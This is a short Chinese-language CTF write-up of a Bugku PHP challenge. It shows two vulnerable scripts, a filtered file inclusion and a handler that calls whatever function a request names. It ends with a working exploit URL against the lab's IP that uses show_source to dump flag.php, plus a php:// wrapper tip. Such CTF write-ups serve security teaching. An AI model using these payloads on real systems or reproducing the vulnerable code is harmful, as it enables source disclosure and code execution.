bugku command-injection

按照提示打开两个php
注意 这里 伪协议最后的resource=不能加.php后缀

<?php  error_reporting(0);
@$file = $_GET["file"];
if(isset($file)) {
	if (preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) {
		echo "<p> error! </p>";
	} else {
		include($file.'.php');
		setcookie("tips","createfun.php");
	}
} else {
	header('Location:include.php?file=index');
}
?>

<?php
$func = @$_GET['func'];
$arg = @$_GET['arg'];
if(isset($func)&&isset($arg)){$func($arg,'');}

这里采用 show_resource(flag.php)来传参

http://82.157.146.43:11891/createfun.php?func=show_source&arg=flag.php

即可获得flag

posted @ 2023-09-19 13:24  N0zoM1z0  阅读(38)  评论(0编辑  收藏  举报